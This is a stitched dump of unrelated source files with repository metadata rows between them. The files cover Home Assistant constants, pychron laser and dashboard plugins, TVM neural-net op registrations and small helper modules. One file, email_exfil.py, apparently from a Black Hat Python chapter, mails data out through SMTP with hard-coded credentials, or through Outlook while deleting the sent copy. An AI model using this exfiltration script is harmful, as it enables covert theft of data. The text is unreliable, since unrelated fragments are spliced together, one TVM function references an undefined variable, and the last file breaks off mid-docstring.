scale (str): The units of the length of time specified in "time_span".
Valid Entries: 'Y', 'M', 'W', 'D'
Returns:
int: Total seconds in time_span.
"""
conversion = {
"Y": 365.25,
"M": 30,
"W": 7,
"D": 1,
}
try:
seconds = datetime.timedelta(
int(time_span) * conversion.get(scale)
).total_seconds()
except ValueError:
log.warning("Error, returning 0.")
seconds = 0
return seconds
def format_sex_string(sex_str):
"""
Converts 'M', 'F', or else to 'male', 'female', or empty string (e.g. '').
Args:
sex_str (str): String consisting of 'M', 'F', '', or None.
Returns:
str: 'M', 'F', or ''
"""
if sex_str == "M":
sex = "male"
elif sex_str == "F":
sex = "female"
else:
sex = ""
return sex
def create_session_label(offset, default_session_label):
"""
Format Session label
Args:
offset (str): Number of days since the start of symptoms or hospitalization.
See SCHEMA.md.
Returns:
str: Label of Session
"""
if not offset:
label = default_session_label
elif np.isnan(offset):
label = default_session_label
else:
label = f"offset_{str(int(offset)).zfill(3)}"
return label
def cleanup_row_dict(row_dict):
"""
Cleanup session age, clinical notes, other notes, and empty values.
Args:
row_dict (dict): Raw dictionary representation of dataframe row.
Returns:
dict: Cleaned version of row_dict.
"""
# fix session age
row_dict["session_age"] = int(row_dict["session_age"])
# fix notes
if row_dict.get("Unnamed: 16"):
row_dict["clinical notes"] = "\s".join(
[row_dict["clinical notes"], row_dict["other notes"]]
)
row_dict["other notes"] = row_dict["Unnamed: 16"]
row_dict["Unnamed: 16"] = ""
# Copy row_dict
return_dict = copy.deepcopy(row_dict)
# To remove empty values
for key, value in row_dict.items():
if value in ["", None]:
return_dict.pop(key)
return return_dict
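# --- Illustrative usage (sketch) ---
# convert_time_to_seconds("2", "W") converts two weeks to seconds
# (2 * 7 days * 86400 s = 1209600.0) and format_sex_string maps the
# single-letter codes to the strings used elsewhere in the pipeline.
def _demo_helpers():
    two_weeks = convert_time_to_seconds("2", "W")
    sex = format_sex_string("F")
    return two_weeks, sex  # expected: (1209600.0, "female")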
| 23.539823
| 84
| 0.589098
|
41996107ce033099b6548c71c6cb4d46404ec838
| 2,711
|
py
|
Python
|
homeassistant/components/wallbox/const.py
|
mikan-megane/core
|
837220cce40890e296920d33a623adbc11bd15a6
|
[
"Apache-2.0"
] | 11
|
2018-02-16T15:35:47.000Z
|
2020-01-14T15:20:00.000Z
|
homeassistant/components/wallbox/const.py
|
mikan-megane/core
|
837220cce40890e296920d33a623adbc11bd15a6
|
[
"Apache-2.0"
] | 79
|
2020-07-23T07:13:37.000Z
|
2022-03-22T06:02:37.000Z
|
homeassistant/components/wallbox/const.py
|
mikan-megane/core
|
837220cce40890e296920d33a623adbc11bd15a6
|
[
"Apache-2.0"
] | 6
|
2018-02-04T03:48:55.000Z
|
2022-01-24T20:37:04.000Z
|
"""Constants for the Wallbox integration."""
from homeassistant.const import (
CONF_ICON,
CONF_NAME,
CONF_UNIT_OF_MEASUREMENT,
ELECTRICAL_CURRENT_AMPERE,
ENERGY_KILO_WATT_HOUR,
LENGTH_KILOMETERS,
PERCENTAGE,
POWER_KILO_WATT,
STATE_UNAVAILABLE,
)
DOMAIN = "wallbox"
CONF_STATION = "station"
CONF_CONNECTIONS = "connections"
CONF_ROUND = "round"
CONF_SENSOR_TYPES = {
"charging_power": {
CONF_ICON: "mdi:ev-station",
CONF_NAME: "Charging Power",
CONF_ROUND: 2,
CONF_UNIT_OF_MEASUREMENT: POWER_KILO_WATT,
STATE_UNAVAILABLE: False,
},
"max_available_power": {
CONF_ICON: "mdi:ev-station",
CONF_NAME: "Max Available Power",
CONF_ROUND: 0,
CONF_UNIT_OF_MEASUREMENT: ELECTRICAL_CURRENT_AMPERE,
STATE_UNAVAILABLE: False,
},
"charging_speed": {
CONF_ICON: "mdi:speedometer",
CONF_NAME: "Charging Speed",
CONF_ROUND: 0,
CONF_UNIT_OF_MEASUREMENT: None,
STATE_UNAVAILABLE: False,
},
"added_range": {
CONF_ICON: "mdi:map-marker-distance",
CONF_NAME: "Added Range",
CONF_ROUND: 0,
CONF_UNIT_OF_MEASUREMENT: LENGTH_KILOMETERS,
STATE_UNAVAILABLE: False,
},
"added_energy": {
CONF_ICON: "mdi:battery-positive",
CONF_NAME: "Added Energy",
CONF_ROUND: 2,
CONF_UNIT_OF_MEASUREMENT: ENERGY_KILO_WATT_HOUR,
STATE_UNAVAILABLE: False,
},
"charging_time": {
CONF_ICON: "mdi:timer",
CONF_NAME: "Charging Time",
CONF_ROUND: None,
CONF_UNIT_OF_MEASUREMENT: None,
STATE_UNAVAILABLE: False,
},
"cost": {
CONF_ICON: "mdi:ev-station",
CONF_NAME: "Cost",
CONF_ROUND: None,
CONF_UNIT_OF_MEASUREMENT: None,
STATE_UNAVAILABLE: False,
},
"state_of_charge": {
CONF_ICON: "mdi:battery-charging-80",
CONF_NAME: "State of Charge",
CONF_ROUND: None,
CONF_UNIT_OF_MEASUREMENT: PERCENTAGE,
STATE_UNAVAILABLE: False,
},
"current_mode": {
CONF_ICON: "mdi:ev-station",
CONF_NAME: "Current Mode",
CONF_ROUND: None,
CONF_UNIT_OF_MEASUREMENT: None,
STATE_UNAVAILABLE: False,
},
"depot_price": {
CONF_ICON: "mdi:ev-station",
CONF_NAME: "Depot Price",
CONF_ROUND: 2,
CONF_UNIT_OF_MEASUREMENT: None,
STATE_UNAVAILABLE: False,
},
"status_description": {
CONF_ICON: "mdi:ev-station",
CONF_NAME: "Status Description",
CONF_ROUND: None,
CONF_UNIT_OF_MEASUREMENT: None,
STATE_UNAVAILABLE: False,
},
}
| 27.11
| 60
| 0.618591
|
cd6b1fff3e554f09daaa5b0da4a4873248accd41
| 437
|
py
|
Python
|
coover/__init__.py
|
coverosu/coover
|
3ed295a1e3bde9091f506bc8835faf9d12ec1176
|
[
"MIT"
] | null | null | null |
coover/__init__.py
|
coverosu/coover
|
3ed295a1e3bde9091f506bc8835faf9d12ec1176
|
[
"MIT"
] | null | null | null |
coover/__init__.py
|
coverosu/coover
|
3ed295a1e3bde9091f506bc8835faf9d12ec1176
|
[
"MIT"
] | 1
|
2020-10-22T09:48:20.000Z
|
2020-10-22T09:48:20.000Z
|
"""\
This package is mainly for people who want to code with Python around osu!, but don't want to write everything from scratch.
Use this package for code that I tend to rewrite a lot, such as `requests`-type code.
"""
__title__ = 'coover'
__author__ = 'coverosu'
__license__ = 'MIT'
__copyright__ = 'Copyright 2020 coverosu'
__version__ = '0.1'
from .OsuAPIWrapper import *
from .Beatmap import *
from .OsuApiV2 import *
from .replayparser import *
| 29.133333
| 109
| 0.750572
|
fb1c3656dabbec2198d8230719062062e4a20056
| 3,150
|
py
|
Python
|
pychron/dashboard/tasks/server/panes.py
|
ael-noblegas/pychron
|
6ebbbb1f66a614972b62b7a9be4c784ae61b5d62
|
[
"Apache-2.0"
] | 1
|
2019-02-27T21:57:44.000Z
|
2019-02-27T21:57:44.000Z
|
pychron/dashboard/tasks/server/panes.py
|
ael-noblegas/pychron
|
6ebbbb1f66a614972b62b7a9be4c784ae61b5d62
|
[
"Apache-2.0"
] | 80
|
2018-07-17T20:10:20.000Z
|
2021-08-17T15:38:24.000Z
|
pychron/dashboard/tasks/server/panes.py
|
AGESLDEO/pychron
|
1a81e05d9fba43b797f335ceff6837c016633bcf
|
[
"Apache-2.0"
] | null | null | null |
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from pyface.tasks.traits_dock_pane import TraitsDockPane
from pyface.tasks.traits_task_pane import TraitsTaskPane
from traitsui.api import View, UItem, VGroup, HGroup, Group, VSplit
# ============= standard library imports ========================
# ============= local library imports ==========================
from traitsui.editors import TableEditor, InstanceEditor, ListEditor
from traitsui.extras.checkbox_column import CheckboxColumn
from traitsui.table_column import ObjectColumn
from pychron.core.ui.custom_label_editor import CustomLabel
class DashboardCentralPane(TraitsTaskPane):
def traits_view(self):
url = CustomLabel('object.notifier.url', label='URL')
agrp = VGroup(UItem('devices', editor=ListEditor(mutable=False,
style='custom',
editor=InstanceEditor(
view=View(UItem('graph', style='custom'))))), label='All')
igrp = VGroup(UItem('selected_device', style='custom'), label='Individual')
tgrp = HGroup(url, UItem('clear_button', tooltip='Clear current errors'))
# v = View(
# VGroup(HGroup(url, UItem('clear_button', tooltip='Clear current errors')),
# UItem('selected_device',
# style='custom'),
#
# )))
v = View(VGroup(tgrp, Group(agrp, igrp, layout='tabbed')))
return v
class DashboardDevicePane(TraitsDockPane):
id = 'pychron.dashboard.devices'
def traits_view(self):
cols = [CheckboxColumn(name='use'),
ObjectColumn(name='name', editable=False)]
editor = TableEditor(columns=cols,
selected='selected_device')
cols = [ObjectColumn(name='name', label='Name'),
ObjectColumn(name='last_value', label='Value'),
ObjectColumn(name='last_time_str', label='Timestamp')]
veditor = TableEditor(columns=cols,
editable=False)
v = View(VSplit(UItem('devices', editor=editor),
UItem('values', editor=veditor)))
return v
# ============= EOF =============================================
| 42.567568
| 119
| 0.564127
|
b48bfde97f334bbe87b1183363efa1ccfd0ca715
| 8,444
|
py
|
Python
|
python/tvm/relay/op/nn/_nn.py
|
qqsun8819/tvm
|
53ac89ede7cddd1649b01b2ff10cc67a963757ce
|
[
"Apache-2.0"
] | null | null | null |
python/tvm/relay/op/nn/_nn.py
|
qqsun8819/tvm
|
53ac89ede7cddd1649b01b2ff10cc67a963757ce
|
[
"Apache-2.0"
] | null | null | null |
python/tvm/relay/op/nn/_nn.py
|
qqsun8819/tvm
|
53ac89ede7cddd1649b01b2ff10cc67a963757ce
|
[
"Apache-2.0"
] | null | null | null |
#pylint: disable=invalid-name, unused-argument
"""Backend compiler related feature registration"""
import topi
from topi.util import get_const_int, get_const_tuple
from .. import op as reg
from ..op import OpPattern, schedule_injective
# relu
reg.register_schedule("nn.relu", schedule_injective)
reg.register_pattern("nn.relu", OpPattern.ELEMWISE)
# softmax
@reg.register_schedule("nn.softmax")
def schedule_softmax(_, outputs, target):
"""Schedule definition of softmax"""
with target:
return topi.generic.schedule_softmax(outputs)
reg.register_pattern("nn.softmax", OpPattern.OPAQUE)
schedule_broadcast = schedule_injective
@reg.register_schedule("nn.log_softmax")
def schedule_log_softmax(_, outputs, target):
"""Schedule definition of log_softmax"""
with target:
return topi.generic.schedule_softmax(outputs)
reg.register_pattern("nn.log_softmax", OpPattern.OPAQUE)
# dense
@reg.register_compute("nn.dense")
def compute_dense(attrs, inputs, out_type, target):
"""Compute definition of dense"""
return [topi.nn.dense(inputs[0], inputs[1])]
@reg.register_schedule("nn.dense")
def schedule_dense(attrs, outputs, target):
"""Schedule definition of dense"""
with target:
return topi.generic.schedule_dense(outputs)
reg.register_pattern("nn.dense", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# conv2d
@reg.register_compute("nn.conv2d")
def compute_conv2d(attrs, inputs, out_type, target):
"""Compute definition of conv2d"""
padding = get_const_tuple(attrs.padding)
strides = get_const_tuple(attrs.strides)
dilation = get_const_tuple(attrs.dilation)
groups = attrs.groups
layout = attrs.data_layout
weight_layout = attrs.weight_layout
out_dtype = attrs.out_dtype
out_dtype = (inputs[0].dtype if (out_dtype == "same" or out_dtype == "")
else out_dtype)
assert layout in ["NCHW", "NHWC", "NCHW4c"]
(dilation_h, dilation_w) = dilation
if dilation_h < 1 or dilation_w < 1:
raise ValueError("dilation should be positive value")
if groups == 1:
out = topi.nn.conv2d(
inputs[0], inputs[1], strides, padding,
dilation, layout, out_dtype=out_dtype)
elif layout == "NCHW" and \
weight_layout == "OIHW" and \
get_const_int(inputs[1].shape[0]) == groups and \
get_const_int(inputs[1].shape[1]) == 1:
out = topi.nn.depthwise_conv2d_nchw(
inputs[0], inputs[1], strides, padding, dilation, out_dtype=out_dtype)
elif layout == "NHWC" and \
kernel_layout == "HWOI" and\
get_const_int(inputs[1].shape[2]) == groups and \
get_const_int(inputs[1].shape[3]) == 1:
out = topi.nn.depthwise_conv2d_nhwc(
inputs[0], inputs[1], strides, padding, dilation, out_dtype=out_dtype)
else:
raise ValueError("not support arbitrary group number for now")
return [out]
@reg.register_schedule("nn.conv2d")
def schedule_conv2d(attrs, outs, target):
"""Schedule definition of conv2d"""
groups = attrs.groups
layout = attrs.data_layout
kernel_layout = attrs.weight_layout
with target:
if groups == 1 and layout == "NCHW":
return topi.generic.schedule_conv2d_nchw(outs)
elif groups == 1 and layout == "NCHW4c":
return topi.generic.schedule_conv2d_nchw(outs)
elif groups == 1 and layout == "NHWC":
return topi.generic.schedule_conv2d_nhwc(outs)
elif groups != 1:
if layout == "NCHW":
# TODO(leyuan, merrymercy, Huyuwei): fold depthwise topi into conv2d.
return topi.generic.schedule_depthwise_conv2d_nchw(outs)
elif layout == "NHWC" and kernel_layout == "HWOI":
return topi.generic.schedule_depthwise_conv2d_nhwc(outs)
raise ValueError("No compatible schedule")
reg.register_pattern("nn.conv2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# conv2d_transpose
@reg.register_compute("nn.conv2d_transpose")
def compute_conv2d_transpose(attrs, inputs, out_dtype, target):
"""Compute definition of conv2d_transpose"""
padding = get_const_tuple(attrs.padding)
strides = get_const_tuple(attrs.strides)
dilation = get_const_tuple(attrs.dilation)
groups = attrs.groups
layout = attrs.data_layout
out_dtype = attrs.out_dtype
out_dtype = (inputs[0].dtype if (out_dtype == "same" or out_dtype == "")
else out_dtype)
assert layout == "NCHW", "only support nchw for now"
assert dilation == (1, 1), "not support dilate now"
assert groups == 1, "only support groups == 1 for now"
out = topi.nn.conv2d_transpose_nchw(inputs[0], inputs[1], strides, padding, out_dtype)
output_padding = get_const_tuple(attrs.output_padding)
out = topi.nn.pad(out,
[0, 0, 0, 0], [0, 0, output_padding[0], output_padding[1]])
return [out]
@reg.register_schedule("nn.conv2d_transpose")
def schedule_conv2d_transpose(attrs, outs, target):
"""Schedule definition of conv2d_transpose"""
with target:
return topi.generic.schedule_conv2d_transpose_nchw(outs)
reg.register_pattern("nn.conv2d_transpose", OpPattern.OUT_ELEMWISE_FUSABLE)
# bias_add
@reg.register_compute("nn.bias_add")
def compute_bias_add(attrs, inputs, out_dtype, target):
"""Compute definition of conv2d_transpose"""
axis = attrs.axis
bias = inputs[1]
data_ndim = len(inputs[0].shape)
if axis < 0:
axis = axis + data_ndim
num_newaxis = data_ndim - axis - 1
if num_newaxis:
bias = topi.expand_dims(bias, axis=1, num_newaxis=num_newaxis)
return [topi.add(inputs[0], bias)]
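# Hedged reference sketch of the axis handling above, written with plain NumPy
# (NumPy is only used for illustration here; the real op goes through topi).
# The bias gets trailing singleton dims so broadcasting lines it up with the
# requested axis of the data tensor.
import numpy as np
def _bias_add_ref(data, bias, axis):
    if axis < 0:
        axis += data.ndim
    num_newaxis = data.ndim - axis - 1
    if num_newaxis:
        bias = bias.reshape(bias.shape + (1,) * num_newaxis)
    return data + bias
assert _bias_add_ref(np.zeros((2, 3, 4, 4)), np.arange(3.0), axis=1).shape == (2, 3, 4, 4)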
reg.register_schedule("nn.bias_add", schedule_injective)
reg.register_pattern("nn.bias_add", OpPattern.BROADCAST)
# max_pool2d
@reg.register_schedule("nn.max_pool2d")
def schedule_max_pool2d(attrs, outs, target):
"""Schedule definition of max_pool2d"""
layout = attrs.layout
with target:
return topi.generic.schedule_pool(outs, layout)
reg.register_pattern("nn.max_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# avg_pool2d
@reg.register_schedule("nn.avg_pool2d")
def schedule_avg_pool2d(attrs, outs, target):
"""Schedule definition of avg_pool2d"""
layout = attrs.layout
with target:
return topi.generic.schedule_pool(outs, layout)
reg.register_pattern("nn.avg_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# global_max_pool2d
@reg.register_schedule("nn.global_max_pool2d")
def schedule_global_max_pool2d(_, outs, target):
"""Schedule definition of global_max_pool2d"""
with target:
return topi.generic.schedule_global_pool(outs)
reg.register_pattern("nn.global_max_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# global_avg_pool2d
@reg.register_schedule("nn.global_avg_pool2d")
def schedule_global_avg_pool2d(_, outs, target):
"""Schedule definition of global_avg_pool2d"""
with target:
return topi.generic.schedule_global_pool(outs)
reg.register_pattern("nn.global_avg_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# leaky_relu
reg.register_schedule("nn.leaky_relu", schedule_broadcast)
reg.register_pattern("nn.leaky_relu", OpPattern.ELEMWISE)
# prelu
reg.register_schedule("nn.prelu", schedule_broadcast)
reg.register_pattern("nn.prelu", OpPattern.BROADCAST)
# flatten
reg.register_schedule("nn.batch_flatten", schedule_broadcast)
reg.register_pattern("nn.batch_flatten", OpPattern.INJECTIVE)
# lrn
@reg.register_compute("nn.lrn")
def compute_lrn(attrs, inputs, out_dtype, target):
"""Compute definition of lrn"""
assert len(inputs) == 1
return [topi.nn.lrn(inputs[0], attrs.size, attrs.axis,
attrs.alpha, attrs.beta, attrs.bias)]
@reg.register_schedule("nn.lrn")
def schedule_lrn(attrs, outs, target):
"""Schedule definition of lrn"""
with target:
return topi.generic.schedule_lrn(outs)
reg.register_pattern("nn.lrn", OpPattern.OPAQUE)
# l2_normalize
@reg.register_compute("nn.l2_normalize")
def compute_l2_normalize(attrs, inputs, out_dtype, target):
"""Compute definition of l2 normalize"""
return [topi.nn.l2_normalize(inputs[0], attrs.eps, attrs.axis)]
@reg.register_schedule("nn.l2_normalize")
def schedule_l2_normalize(attrs, outs, target):
"""Schedule definition of l2 normalize"""
with target:
return topi.generic.schedule_l2_normalize(outs)
reg.register_pattern("nn.l2_normalize", OpPattern.OUT_ELEMWISE_FUSABLE)
| 34.748971
| 90
| 0.709261
|
6c1733f0e97a75b2c4bbfcf1320a69ab3b513f2e
| 959
|
py
|
Python
|
Chapter09/email_exfil.py
|
Mazuco/Black-Hat-Python
|
0f7432d523d88ddb4295d9e558ead679961ecbb2
|
[
"MIT"
] | 1
|
2021-12-14T07:05:49.000Z
|
2021-12-14T07:05:49.000Z
|
Chapter09/email_exfil.py
|
Mazuco/Black-Hat-Python
|
0f7432d523d88ddb4295d9e558ead679961ecbb2
|
[
"MIT"
] | null | null | null |
Chapter09/email_exfil.py
|
Mazuco/Black-Hat-Python
|
0f7432d523d88ddb4295d9e558ead679961ecbb2
|
[
"MIT"
] | 1
|
2021-06-12T12:25:52.000Z
|
2021-06-12T12:25:52.000Z
|
import smtplib
import time
import win32com.client
smtp_server = 'smtp.example.com'
smtp_port = 587
smtp_acct = 'tim@example.com'
smtp_password = 'seKret'
tgt_accts = ['tim@elsewhere.com']
def plain_email(subject, contents):
    message = f'Subject: {subject}\nFrom: {smtp_acct}\n'
message += f'To: {tgt_accts}\n\n{contents.decode()}'
server = smtplib.SMTP(smtp_server, smtp_port)
server.starttls()
server.login(smtp_acct, smtp_password)
#server.set_debuglevel(1)
server.sendmail(smtp_acct, tgt_accts, message)
time.sleep(1)
server.quit()
def outlook(subject, contents):
outlook = win32com.client.Dispatch("Outlook.Application")
message = outlook.CreateItem(0)
message.DeleteAfterSubmit = True
message.Subject = subject
message.Body = contents.decode()
message.To = 'boodelyboo@boodelyboo.com'
message.Send()
if __name__ == '__main__':
    plain_email('test2 message', b'attack at dawn.')  # bytes: plain_email decodes its contents argument
| 28.205882
| 61
| 0.705944
|
15f961d58288b84081aa3687f9f5d743dbb7aa4e
| 10,024
|
py
|
Python
|
pychron/lasers/tasks/plugins/laser_plugin.py
|
WiscAr/pychron
|
8d335d53ba7a5fc70760d9a7cb60540ad169ae84
|
[
"Apache-2.0"
] | null | null | null |
pychron/lasers/tasks/plugins/laser_plugin.py
|
WiscAr/pychron
|
8d335d53ba7a5fc70760d9a7cb60540ad169ae84
|
[
"Apache-2.0"
] | 80
|
2018-07-17T20:10:20.000Z
|
2021-08-17T15:38:24.000Z
|
pychron/lasers/tasks/plugins/laser_plugin.py
|
WiscAr/pychron
|
8d335d53ba7a5fc70760d9a7cb60540ad169ae84
|
[
"Apache-2.0"
] | null | null | null |
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from __future__ import print_function
import os
from envisage.ui.tasks.task_extension import TaskExtension
from envisage.ui.tasks.task_factory import TaskFactory
from pyface.tasks.action.schema import SMenu
from pyface.tasks.action.schema_addition import SchemaAddition
from traits.api import List, Str
from pychron.core.helpers.filetools import glob_list_directory
from pychron.core.helpers.strtools import to_bool
from pychron.envisage.initialization.initialization_parser import InitializationParser
from pychron.envisage.tasks.base_task_plugin import BaseTaskPlugin
from pychron.envisage.tasks.list_actions import PatternAction, ShowMotionConfigureAction
from pychron.lasers.laser_managers.ilaser_manager import ILaserManager
from pychron.lasers.tasks.laser_actions import OpenPowerMapAction, OpenPatternAction, NewPatternAction, \
LaserScriptExecuteAction
# from pychron.lasers.tasks.laser_calibration_task import LaserCalibrationTask
from pychron.paths import paths
def pattern_action(name, application, manager_name, lase=False):
def factory():
a = PatternAction(id='pattern.action.{}'.format(name),
name=name.capitalize(),
application=application,
manager_name=manager_name,
pattern_path=os.path.join(paths.pattern_dir, name),
lase=lase)
return a
return factory
class CoreClientLaserPlugin(BaseTaskPlugin):
pass
class CoreLaserPlugin(BaseTaskPlugin):
def _task_extensions_default(self):
actions = [SchemaAddition(factory=OpenPowerMapAction,
path='MenuBar/file.menu/Open'),
SchemaAddition(id='Open Pattern',
factory=OpenPatternAction,
path='MenuBar/file.menu/Open'),
SchemaAddition(id='New Pattern',
factory=NewPatternAction,
path='MenuBar/file.menu/New')]
return [TaskExtension(actions=actions)]
class BaseLaserPlugin(BaseTaskPlugin):
managers = List(contributes_to='pychron.hardware.managers')
klass = None
mode = None
def _service_offers_default(self):
"""
"""
if self.klass is None:
raise NotImplementedError
so = self.service_offer_factory(protocol=ILaserManager, factory=self._manager_factory)
return [so]
def _manager_factory(self):
"""
"""
ip = InitializationParser()
plugin = ip.get_plugin(self.klass[1].replace('Manager', ''), category='hardware')
mode = ip.get_parameter(plugin, 'mode')
self.mode = mode
klass = ip.get_parameter(plugin, 'klass')
if klass is None and mode == 'client':
klass = 'PychronLaserManager'
pkg = 'pychron.lasers.laser_managers.pychron_laser_manager'
factory = __import__(pkg, fromlist=[klass])
klassfactory = getattr(factory, klass)
else:
factory = __import__(self.klass[0], fromlist=[self.klass[1]])
klassfactory = getattr(factory, self.klass[1])
params = dict(name=self.name)
if mode == 'client':
try:
tag = ip.get_parameter(plugin, 'communications', element=True)
for attr in ['host', 'port', 'kind', 'timeout',
'baudrate',
'parity',
'stopbits',
'message_frame', ('use_end', to_bool)]:
func = None
if isinstance(attr, tuple):
attr, func = attr
try:
elem = tag.find(attr)
if elem is not None:
v = elem.text.strip()
if func:
v = func(v)
params[attr] = v
else:
self.debug('No communications attribute {}'.format(attr))
except Exception as e:
print('client comms fail a', attr, e)
except Exception as e:
print('client comms fail b', e)
m = klassfactory(**params)
m.mode = mode
m.bootstrap()
m.plugin_id = self.id
m.bind_preferences(self.id)
return m
def _managers_default(self):
"""
"""
d = []
if self.klass is not None:
d = [dict(name=self.name,
plugin_name=self.name,
manager=self._get_manager())]
return d
def _get_manager(self):
return self.application.get_service(ILaserManager, 'name=="{}"'.format(self.name))
# def execute_pattern(self, name):
# self._get_manager().execute_pattern(name)
# def _preferences_default(self):
# root = paths.preferences_dir
# path = os.path.join(root, 'preferences.ini')
# if not os.path.isfile(path):
# with open(path, 'w'):
# pass
# return ['file://{}'.format(path)]
def _setup_pattern_extensions(self, exts, actions=None):
if actions is None:
actions = []
lactions = []
for f in glob_list_directory(paths.pattern_dir, extension='.lp', remove_extension=True):
actions.append(SchemaAddition(id='pattern.{}'.format(f),
factory=pattern_action(f, self.application, self.name),
path='MenuBar/laser.menu/patterns.menu'))
lactions.append(SchemaAddition(id='pattern.lase.{}'.format(f),
factory=pattern_action(f, self.application, self.name, lase=True),
path='MenuBar/laser.menu/patterns.lase.menu'))
if actions:
actions.insert(0, SchemaAddition(id='patterns.menu',
factory=lambda: SMenu(name='Execute Patterns', id='patterns.menu'),
path='MenuBar/laser.menu'))
lactions.insert(0, SchemaAddition(id='patterns.lase.menu',
factory=lambda: SMenu(name='Execute and Lase Patterns',
id='patterns.lase.menu'),
path='MenuBar/laser.menu'))
exts.append(TaskExtension(actions=lactions))
exts.append(TaskExtension(actions=actions))
else:
self.warning('no patterns scripts located in "{}"'.format(paths.pattern_dir))
def _create_task_extensions(self):
exts = []
if self.mode != 'client':
def efactory():
return SMenu(id='laser.menu', name='Laser')
actions = [SchemaAddition(id='Laser',
factory=efactory,
path='MenuBar',
before='tools.menu',
after='view.menu')]
exts = [TaskExtension(actions=actions)]
return exts
class FusionsPlugin(BaseLaserPlugin):
task_name = Str
sources = List(contributes_to='pychron.video.sources')
def test_communication(self):
man = self._get_manager()
return man.test_connection()
def _tasks_default(self):
return [TaskFactory(id=self.id,
task_group='hardware',
factory=self._task_factory,
name=self.task_name,
image='laser',
accelerator=self.accelerator),
# TaskFactory(id='pychron.laser.calibration',
# task_group='hardware',
# factory=self._calibration_task_factory,
# name='Laser Calibration',
# accelerator='Ctrl+Shift+2')
]
def _sources_default(self):
ip = InitializationParser()
plugin = ip.get_plugin(self.task_name.replace(' ', ''),
category='hardware')
source = ip.get_parameter(plugin, 'video_source')
rs = []
if source:
rs = [(source, self.task_name)]
return rs
def _task_extensions_default(self):
exts = self._create_task_extensions()
if self.mode != 'client':
actions = [SchemaAddition(factory=ShowMotionConfigureAction,
path='MenuBar/laser.menu'),
SchemaAddition(factory=LaserScriptExecuteAction,
path='MenuBar/laser.menu')]
self._setup_pattern_extensions(exts, actions)
return exts
# ============= EOF =============================================
| 39.003891
| 112
| 0.538109
|
7937043fa47d893b22b424a9d3db3e3364711f63
| 2,573
|
py
|
Python
|
mermer/server/upnp.py
|
sumilying/mermer-chain
|
a493e56c3aca6cef341aff0eae04f5e52bc55f09
|
[
"Apache-2.0"
] | 2
|
2021-11-12T13:32:35.000Z
|
2021-11-16T08:47:28.000Z
|
mermer/server/upnp.py
|
sumilying/mermer-blockchain
|
a493e56c3aca6cef341aff0eae04f5e52bc55f09
|
[
"Apache-2.0"
] | null | null | null |
mermer/server/upnp.py
|
sumilying/mermer-blockchain
|
a493e56c3aca6cef341aff0eae04f5e52bc55f09
|
[
"Apache-2.0"
] | null | null | null |
import logging
import threading
from queue import Queue
from typing import Optional
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
thread: Optional[threading.Thread] = None
queue: Queue = Queue()
def __init__(self):
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
try:
self.upnp.deleteportmapping(port, "TCP")
except Exception as e:
log.info(f"Removal of previous portmapping failed. This does not indicate an error: {e}")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "mermer", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
log.info(f"UPnP, releasing port {port}")
self.upnp.deleteportmapping(port, "TCP")
log.info(f"UPnP, Port {port} closed")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
log.info(
"UPnP failed. This is not required to run mermer, it allows incoming connections from other peers."
)
log.info(e)
self.thread = threading.Thread(target=run)
self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
if not self.thread:
return
self.queue.put(("shutdown",))
log.info("UPnP, shutting down thread")
self.thread.join(5)
self.thread = None
# this is here just in case the UPnP object is destroyed non-gracefully,
# e.g. via an exception before the main thread can call shutdown()
def __del__(self):
self.shutdown()
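# Minimal usage sketch (illustrative port number; requires the optional
# miniupnpc dependency and a UPnP-capable gateway to do anything useful):
if __name__ == "__main__":
    upnp = UPnP()
    upnp.remap(8444)    # ask the gateway to forward TCP 8444 to this host
    upnp.release(8444)  # later: remove the mapping again
    upnp.shutdown()     # stop the background worker thread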
| 34.306667
| 119
| 0.502138
|
3289b5cf6479505fa72a7aeb23fd337785275bf0
| 1,645
|
py
|
Python
|
listools/llogic/symmetric_difference.py
|
jgarte/listools
|
17ef56fc7dde701890213f248971d8dc7a6e6b7c
|
[
"MIT"
] | 2
|
2019-01-22T03:50:43.000Z
|
2021-04-22T16:12:17.000Z
|
listools/llogic/symmetric_difference.py
|
jgarte/listools
|
17ef56fc7dde701890213f248971d8dc7a6e6b7c
|
[
"MIT"
] | 2
|
2019-01-22T03:57:49.000Z
|
2021-04-22T22:03:47.000Z
|
listools/llogic/symmetric_difference.py
|
jgarte/listools
|
17ef56fc7dde701890213f248971d8dc7a6e6b7c
|
[
"MIT"
] | 1
|
2021-04-22T21:13:00.000Z
|
2021-04-22T21:13:00.000Z
|
def symmetric_difference(list_1: list, list_2: list) -> list:
r"""llogic.symmetric_difference(list_1, list_2)
